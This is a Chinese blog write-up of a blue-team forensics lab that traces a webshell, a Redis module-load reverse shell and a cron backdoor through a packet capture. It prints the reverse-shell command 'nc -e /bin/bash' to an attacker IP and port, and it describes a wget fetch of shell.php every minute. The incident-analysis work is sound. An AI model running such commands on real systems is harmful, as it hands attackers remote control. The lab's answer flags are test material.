当前位置: 首页 > news >正文

玄机靶场 | 第九章-blueteam 的小心思3

文章目录

    • 一、前言
    • 二、索引
    • 三、题目列表
      • 步骤#1
        • 审计日志,攻击者下载恶意木马文件的 ip是多少 flag{ip}
      • 步骤#2
        • 审计流量包,木马文件连接密码是什么? flag{xxx}
      • 步骤#3
        • 审计流量包,攻击者反弹的IP和端口是什么? flag{ip:port}
      • 步骤#4
        • 提交黑客上传恶意文件的 md5 md5sum xxx.so
      • 步骤#5
        • 攻击者在服务器内权限维持请求外部地址和恶意文件的地址 flag{http://xxxxxxxxxx/xx.xxx}

一、前言

题目简述:服务器有对外链接请求的痕迹,现提供一段 waf 上截获的数据包,分析对应的虚拟机环境跟数据包,找到关键字符串并且尝试修复漏洞

账号:root,密码:root123,流量包在/result.pcap

二、索引

三、题目列表

步骤#1

审计日志,攻击者下载恶意木马文件的 ip是多少 flag{ip}

先通过wireshark语法筛选出http流量

我们简单分析这个流量包,前面有大量的404状态码,表明黑客正在进行目录扫描。后面黑客发现了evil.php文件,但是不知道参数名是什么,对参数名进行了大量尝试,最后发现参数command可以执行命令

继续分析,可以看到黑客执行命令把shell.php下载到目标机器上

在这里插入图片描述

因此可知攻击者下载恶意木马文件的ip地址为192.168.150.253

flag{192.168.150.253}

步骤#2

审计流量包,木马文件连接密码是什么? flag{xxx}

继续向下分析,可以看到攻击者通过POST数据包与shell.php进行通信

在这里插入图片描述

因此连接密码就是cmd

flag{cmd}

步骤#3

审计流量包,攻击者反弹的IP和端口是什么? flag{ip:port}

也是刚才的流量,我们对其内容进行base64解码

在这里插入图片描述

发现@ini_set("display_errors", "0");@set_time_limit(0);,结合前面的特征,可以推断这是通过蚁剑连接的。继续分析流量,发现有个流量记录了外连命令,通过nc反弹shell获得控制权

因此攻击者反弹的IP和端口是192.168.150.199:4444

flag{192.168.150.199:4444}

步骤#4

提交黑客上传恶意文件的 md5 md5sum xxx.so

题目提示文件后缀是.so,我们直接wireshark语法搜索内容包含.so的流量

tcp and frame contains ".so"

可以看到通过redis主从复制上传了一个module.so动态链接库。前面的RESP协议是Redis 客户端和服务器之间通信使用的协议

那我们修改wireshark语法搜索RESP协议的流量

经过分析,前面上传的module.so文件有问题,加载模块后无法执行命令

后面上传了一个符合条件的module.so文件,成功执行系统命令

在这里插入图片描述

攻击者执行了命令nc -e /bin/bash 192.168.150.199 4444反弹shell,因此可以确定这个就是恶意文件

登录目标靶机,在根目录下计算该文件的 MD5 值即可

md5sum module.so

flag{d41d8cd98f00b204e9800998ecf8427e}

步骤#5

攻击者在服务器内权限维持请求外部地址和恶意文件的地址 flag{http://xxxxxxxxxx/xx.xxx}

攻击者要想在服务器内维持权限,肯定是有后门的。然后题目说请求的外部地址和恶意文件的地址,那说明是会定期向外部发送请求的,我们直接查看计划任务

cat /etc/crontab

成功发现黑客留下的后门,通过wget定期向恶意地址下载webshell到目标机器,频率为每分钟执行一次

flag{http://192.168.150.199:88/shell.php}
http://www.dtcms.com/a/355572.html

相关文章:

  • openEuler中LVM调整实现home与root分区空间平衡
  • LeetCode 3446. 按对角线进行矩阵排序
  • Linux部分底层机制
  • 【每天一个知识点】云存储(Cloud Storage)
  • 从混沌到有序:工作流设计的创作迷思与破局之道
  • AI智能农业监测系统深度解读:从大田作物管理到病虫害预警,破解传统农业增产难题
  • 大模型私有化部署
  • RAG概念被误用:AI应用落地需回归上下文工程本质
  • leetcode算法day22
  • kotlin中关于协程的使用
  • 陕西风味马卡龙:家常自制,特色甜趣共享
  • 传输层协议介绍
  • 结构化提示词革命:JSON Prompting如何让AI输出精准如激光
  • 数字化生产管理系统 (MES)
  • 服务器核心组件:CPU 与 GPU 的核心区别、应用场景、协同工作
  • 揭开.NET Core 中 ToList () 与 ToArray () 的面纱:从原理到抉择
  • ansible常用命令的简单练习
  • Linux系统 -- 多线程的控制(互斥与同步)
  • 数学思维好题(冯哈伯公式)-平方根下取整求和
  • 个人博客运行3个月记录
  • 了解ADS中信号和电源完整性的S参数因果关系
  • Typora 教程:从零开始掌握 Markdown 高效写作
  • MySQL事务ACID特性
  • JavaScript中的BOM,DOM和事件
  • 英语单词:ad-hoc
  • BugKu Web渗透之成绩查询
  • 白杨SEO:网站优化怎么做?应用举例和适合哪些企业做?参考
  • 速成Javascript(二)
  • 新书速览|SQL Server运维之道
  • 【第三方网站运行环境测试:服务器配置(如Nginx/Apache)的WEB安全测试重点】